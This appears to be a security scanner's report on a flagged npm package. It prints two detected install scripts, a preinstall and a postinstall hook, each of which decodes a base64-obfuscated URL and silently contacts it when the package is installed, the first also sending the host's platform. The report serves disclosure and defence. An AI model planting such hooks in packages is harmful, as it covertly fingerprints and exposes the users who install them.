Sandworm scans all new npm package versions for malicious install scripts.
Scanning since October 2024.
Detected: 13 Mar 2025
Affected Install Script: preinstall
Package Source: View on npm
This script makes an HTTPS request to a potentially harmful URL that is obtained by decoding a base64-encoded string. The request includes the system platform (process.platform) as the os query parameter, which could be used to target the system or exploit vulnerabilities, posing a risk of remote code execution or data exposure.
Install script: node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform)).setTimeout(100).on('timeout', () => {}).end()"
Detected: 13 Mar 2025
Affected Install Script: postinstall
Package Source: View on npm
This script makes an HTTPS request to a URL that is encoded in base64. If the URL points to a malicious domain, it can be used to exfiltrate sensitive information or execute further harmful actions, potentially compromising the system.
Install script: node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString()).setTimeout(100).on('timeout', () => {}).end()"